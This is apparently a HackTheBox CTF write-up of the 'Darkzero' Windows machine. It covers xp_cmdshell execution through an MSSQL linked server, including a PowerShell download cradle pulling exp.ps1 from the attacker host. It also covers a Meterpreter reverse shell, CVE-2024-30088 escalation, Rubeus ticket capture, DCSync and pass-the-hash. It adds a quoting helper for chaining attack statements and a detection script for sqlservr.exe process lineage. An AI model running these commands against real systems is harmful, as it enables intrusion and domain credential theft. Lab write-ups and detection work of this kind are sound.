# Introduction
Darkzero is a Hard-rated HackTheBox Windows machine. Initial access comes through a Microsoft SQL Server (MSSQL) instance: a linked server lets xp_cmdshell run on a second host, DC02, and a local kernel vulnerability escalates that shell to SYSTEM. From there a Kerberos ticket for the DC01 machine account is captured with Rubeus and used to dump domain secrets, ending in Administrator access to DC01. The environment has two domain controllers with different DNS domains, DC01.darkzero.htb and DC02.darkzero.ext, so the path requires moving between them.
Machine Details:
- **OS:** Windows Server
- **Difficulty:** Hard
- **IP:** 10.10.11.89
- **Technologies:** MSSQL, Kerberos, SMB, PowerShell
# Enumeration
## Nmap Scan
A full-port service scan showed MSSQL listening on its default port, 1433:
```bash
nmap -sV -p- 10.10.11.89
```
Relevant result:
- Port 1433/tcp open: ms-sql-s Microsoft SQL Server
## MSSQL Enumeration
Connected to the MSSQL server with impacket-mssqlclient, using Windows authentication and the discovered credentials for john.w:
```bash
impacket-mssqlclient -windows-auth 'Darkzero.htb/john.w:RFulUtONCOL!@10.10.11.89'
```
Enumerated databases, permissions, and configurations:
- Listed databases using `SELECT name FROM sys.databases;`: master, tempdb, model, msdb
- Checked the login's server-level permissions: only CONNECT SQL and VIEW ANY DATABASE
- Identified the one database with TRUSTWORTHY enabled: msdb (`SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1;`). msdb ships with TRUSTWORTHY on, so this by itself is expected rather than a misconfiguration
Attempted privilege escalation via the trustworthy msdb. This route only works when the login has db_owner in the trustworthy database and that database is owned by a sysadmin, so every attempt dead-ended:
- Tried creating stored procedures and SQL Agent jobs, but permissions were denied
- Enumerated tables and procedures in msdb, but access to sensitive tables such as sysproxies was denied
- Attempted file reads with OPENROWSET(BULK ...), but the ADMINISTER BULK OPERATIONS permission it requires was missing
# Initial Access
## Remote Code Execution via xp_cmdshell
The instance on DC01 has a linked server to DC02.darkzero.ext, and xp_cmdshell was available there. Statements are sent through the link with EXEC('...') AT [linked server]; each hop wraps the inner statement in a string literal, so every single quote inside it must be doubled again at each level. The statement below makes DC02 download and run a PowerShell script (exp.ps1) served from the attacker host at 10.10.14.130:8080:
```sql
EXEC('xp_cmdshell ''powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''''http://10.10.14.130:8080/exp.ps1'''')"''') AT [DC02.darkzero.ext];
```
This gave a shell on DC02 with limited privileges (xp_cmdshell runs as the SQL Server service account, or as the configured proxy account for non-sysadmin callers).
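The quoting in the statement above is the part people get wrong, so here is an added helper (not code from the original writeup or from impacket) that builds EXEC(...) AT [server] statements mechanically and unwraps them again as a self-check. It regenerates the writeup's exact one-hop statement from its parts, and goes one step further by chaining two linked servers; the host names and stager URL are the writeup's, while the second hop [DC03] is a hypothetical server name used only to show the chain.

```python
"""Quoting helper for MSSQL linked-server command execution.

Added example for this writeup; it is not code from the original post or from
impacket. EXEC('...') AT [server] sends the string to the linked server, and
T-SQL escapes a single quote inside a string literal by doubling it, so each
hop doubles the quotes of the hop inside it. The [DC03] hop below is
hypothetical and exists only to demonstrate a two-hop chain.
"""
from __future__ import annotations

STAGER_URL = "http://10.10.14.130:8080/exp.ps1"  # from the writeup
PS_STAGER = (
    'powershell -ep bypass -c "IEX (New-Object Net.WebClient)'
    f".DownloadString('{STAGER_URL}')\""
)
# The exact statement used in the writeup, kept as a reference value.
WRITEUP_STATEMENT = (
    "EXEC('xp_cmdshell ''powershell -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString(''''http://10.10.14.130:8080/exp.ps1'''')\"''') "
    "AT [DC02.darkzero.ext];"
)


def tsql_literal(text: str) -> str:
    """Wrap text as a T-SQL string literal; inner single quotes are doubled."""
    return "'" + text.replace("'", "''") + "'"


def tsql_identifier(name: str) -> str:
    """Bracket-quote an identifier; a literal ] inside it is doubled."""
    return "[" + name.replace("]", "]]") + "]"


def xp_cmdshell(command: str) -> str:
    """Statement that runs an OS command through xp_cmdshell where it executes."""
    return "xp_cmdshell " + tsql_literal(command)


def exec_at(statement: str, linked_server: str) -> str:
    """Run statement on a linked server. The link needs RPC OUT enabled."""
    return f"EXEC({tsql_literal(statement)}) AT {tsql_identifier(linked_server)}"


def exec_via_hops(statement: str, hops: list[str]) -> str:
    """Route statement through linked servers in order: hops[0] is reached
    first, hops[-1] is where the statement finally runs. The last hop is
    wrapped first so that it ends up innermost."""
    for server in reversed(hops):
        statement = exec_at(statement, server)
    return statement + ";"


def unquote_literal(literal: str) -> str:
    """Inverse of tsql_literal."""
    if len(literal) < 2 or literal[0] != "'" or literal[-1] != "'":
        raise ValueError("not a T-SQL string literal")
    return literal[1:-1].replace("''", "'")


def unwrap_hops(statement: str) -> tuple[str, list[str]]:
    """Peel EXEC(...) AT [...] layers off a statement, returning the innermost
    statement and the hop list in the order exec_via_hops takes it. Used as
    a self-check that the quoting round-trips."""
    hops: list[str] = []
    body = statement[:-1] if statement.endswith(";") else statement
    while body.startswith("EXEC(") and body.endswith("]"):
        cut = body.rfind(") AT [")  # the outermost hop is always last
        if cut < 0:
            break
        hops.append(body[cut + len(") AT ["):-1].replace("]]", "]"))
        body = unquote_literal(body[len("EXEC("):cut])
    return body, hops


def writeup_statement() -> str:
    """The writeup's one-hop xp_cmdshell call, regenerated from its parts."""
    return exec_via_hops(xp_cmdshell(PS_STAGER), ["DC02.darkzero.ext"])


def two_hop_example() -> str:
    """Hypothetical chain DC01 -> DC02 -> DC03 (DC03 is not on the machine)."""
    return exec_via_hops("SELECT @@SERVERNAME", ["DC02.darkzero.ext", "DC03"])


if __name__ == "__main__":
    print(writeup_statement())
    print(two_hop_example())
    print(unwrap_hops(two_hop_example()))
```

Before sending anything through a link, confirm it exists and allows remote execution: `EXEC sp_linkedservers;` lists the links, `SELECT name, is_rpc_out_enabled FROM sys.servers;` shows whether EXEC ... AT will be accepted, and `EXEC('SELECT SYSTEM_USER') AT [DC02.darkzero.ext];` shows which login the link maps you to on the far side, which is what decides whether xp_cmdshell is reachable there.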
# Privilege Escalation
## Stabilizing Shell and Switching to Meterpreter
- Created a Meterpreter payload for a reverse TCP connection back to the attacker host:
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.130 LPORT=4444 -f exe -o exp.exe
```
- In Metasploit, started a handler with PAYLOAD, LHOST and LPORT set to the same values as the msfvenom payload, then transferred exp.exe to DC02 and launched it from the xp_cmdshell shell:
```
use exploit/multi/handler
```
- Ran the local exploit suggester (post/multi/recon/local_exploit_suggester) against the new session; it identified CVE-2024-30088 (the AuthzBasep kernel TOCTOU) as applicable
- Exploited it with the matching module, pointing SESSION at the Meterpreter session:
```
use exploit/windows/local/cve_2024_30088_authz_basep
```
This escalated privileges to SYSTEM on DC02.
## User Flag
Located user.txt on DC02:
```
type C:\Users\Administrator\Desktop\user.txt
```
# Post-Exploitation and Lateral Movement
## Kerberos Ticket Capture with Rubeus
- Uploaded Rubeus.exe to DC02 and ran it in monitor mode from the SYSTEM shell (monitor needs elevation, since it reads the tickets of other logon sessions); it polls for new logon sessions and dumps any TGT that arrives with them:
```
C:\Windows\Temp\Rubeus.exe monitor /interval:1 /nowrap
```
- Triggered an outbound authentication from the MSSQL instance on DC01 by pointing xp_dirtree at a UNC path on DC02; the share name does not need to exist, the service only has to attempt the connection:
```sql
EXEC xp_dirtree '\\DC02.darkzero.ext\sfsdafasd', 1, 10;
```
The SQL Server service on DC01 authenticates to DC02 as the machine account DC01$. Because DC02 is a domain controller it is trusted for unconstrained delegation by default, so DC01$'s TGT is forwarded inside the service ticket and lands in the new logon session on DC02, where Rubeus captured it.
## Ticket Conversion and Domain Dumping
- Saved the base64 ticket blob printed by Rubeus to ticket.bs4.kirbi
- Decoded it to a binary .kirbi, converted that to a ccache with ticketConverter.py (listed under Tools Used), and exported the ccache path in KRB5CCNAME so the `-k` option below picks it up:
```bash
cat ticket.bs4.kirbi | base64 -d > ticket.kirbi
```
- Used the ticket for DCSync against DC01. The DC01$ machine account holds the directory replication rights that secretsdump's DRSUAPI method needs, so it can pull every account's hash. The target name must resolve (map DC01.darkzero.htb to 10.10.11.89 in /etc/hosts) and the attacker clock must be within Kerberos skew tolerance of the DC, otherwise the ticket is rejected:
```bash
impacket-secretsdump -k -no-pass 'darkzero.htb/DC01$@DC01.darkzero.htb'
```
# Root Access
## Administrator Access on DC01
Used the Administrator NTLM hash from the dump to pass-the-hash over WinRM to DC01:
```bash
evil-winrm -i 10.10.11.89 -u Administrator -H <NTLM_hash>
```
Located root.txt:
```
type C:\Users\Administrator\Desktop\root.txt
```
# Conclusion
This machine demonstrated advanced Windows domain exploitation techniques:
- MSSQL enumeration and RCE via xp_cmdshell
- Local privilege escalation using recent CVEs
- Kerberos ticket abuse for lateral movement
- Domain credential dumping and pass-the-hash
Key takeaways:
- A TRUSTWORTHY database owned by a sysadmin is an escalation path only for a login with db_owner in it; msdb has TRUSTWORTHY on by default, and here the route was closed
- Rubeus monitor on a host trusted for unconstrained delegation (every domain controller, by default) harvests the TGT of any account that can be made to authenticate to it
- MSSQL features (linked servers, xp_cmdshell, xp_dirtree coercion) combine with Windows authentication flows to move between hosts without a single exploit on the database itself
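From the defender's side, the durable signal for the xp_cmdshell step is process lineage: xp_cmdshell runs its argument by having the SQL Server service process (sqlservr.exe) spawn cmd.exe, so any shell or script interpreter whose ancestry leads back to sqlservr.exe deserves a look, and a download cradle in its command line makes it urgent. The detection below is an added example, not part of the original writeup; its sample events are constructed in a simplified Sysmon Event ID 1 (process creation) shape, and the SQL Server install path, process IDs and user names in them are assumptions.

```python
"""Process-lineage detection for xp_cmdshell abuse.

Added example for this writeup, not code from the post. The EVENTS list is a
constructed, simplified Sysmon Event ID 1 shape; the install path, pids and
user names are assumptions, not logs from the machine.
"""
from __future__ import annotations
import ntpath
import re

SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "curl.exe",
}
# Download cradles and encoded commands typical of a stager.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
SQL_IMAGE = "sqlservr.exe"

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = ('powershell -ep bypass -c "IEX (New-Object Net.WebClient)'
          ".DownloadString('http://10.10.14.130:8080/exp.ps1')\"")

# Constructed sample events: host, pid, ppid, image, parent_image, cmdline, user.
EVENTS = [
    # The xp_cmdshell chain from the writeup: sqlservr -> cmd -> powershell.
    {"host": "DC02", "pid": 4120, "ppid": 1880, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": SQLSERVR, "cmdline": "cmd.exe /c " + CRADLE,
     "user": r"NT Service\MSSQLSERVER"},
    {"host": "DC02", "pid": 4300, "ppid": 4120, "image": PS,
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": CRADLE,
     "user": r"NT Service\MSSQLSERVER"},
    # Same cradle launched by an operator from Explorer: no sqlservr ancestry.
    {"host": "DC02", "pid": 5010, "ppid": 3000, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": CRADLE,
     "user": r"DARKZERO\operator"},
    # The service itself starting is not interesting.
    {"host": "DC02", "pid": 1880, "ppid": 700, "image": SQLSERVR,
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": '"' + SQLSERVR + '" -sMSSQLSERVER', "user": r"NT Service\MSSQLSERVER"},
    # A plain recon command through xp_cmdshell: flagged, but lower severity.
    {"host": "DC02", "pid": 4500, "ppid": 1880, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": SQLSERVR, "cmdline": "cmd.exe /c whoami",
     "user": r"NT Service\MSSQLSERVER"},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(event: dict, by_pid: dict[tuple[str, int], dict]) -> list[str]:
    """Ancestor image names, nearest parent first. Follows ppid through the
    events we have and falls back to the recorded parent_image when the
    parent's own creation event is missing (e.g. a service started before
    logging began). The seen set guards against pid-reuse loops."""
    chain: list[str] = []
    seen = {event["pid"]}
    cur = event
    while True:
        parent = by_pid.get((cur["host"], cur["ppid"]))
        if parent is None or parent["pid"] in seen:
            chain.append(basename(cur["parent_image"]))
            return chain
        chain.append(basename(parent["image"]))
        seen.add(parent["pid"])
        cur = parent


def detect(events: list[dict]) -> list[dict]:
    """One finding per shell/interpreter/downloader that descends from
    sqlservr.exe. Severity is 'high' when the command line also carries a
    download cradle or encoded command, otherwise 'medium'."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        if image not in SUSPICIOUS_CHILDREN:
            continue
        chain = ancestry(e, by_pid)
        if SQL_IMAGE not in chain:
            continue
        severity = "high" if DOWNLOAD_CRADLE.search(e["cmdline"]) else "medium"
        findings.append({
            "host": e["host"], "pid": e["pid"], "user": e["user"],
            "image": image, "severity": severity,
            "lineage": " <- ".join([image] + chain),
        })
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['severity']:6} {f['host']} pid={f['pid']} {f['user']}: {f['lineage']}")
```

The lineage check is what keeps this from being a noisy "powershell with DownloadString" rule: the operator-launched cradle under explorer.exe is ignored, while the same command under sqlservr.exe is flagged, and a bare `whoami` through xp_cmdshell still surfaces at medium so the first recon step is not missed.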
# Tools Used
- nmap
- impacket-mssqlclient
- Metasploit Framework
- Rubeus
- ticketConverter.py
- impacket-secretsdump
- evil-winrm

by Mrx0rd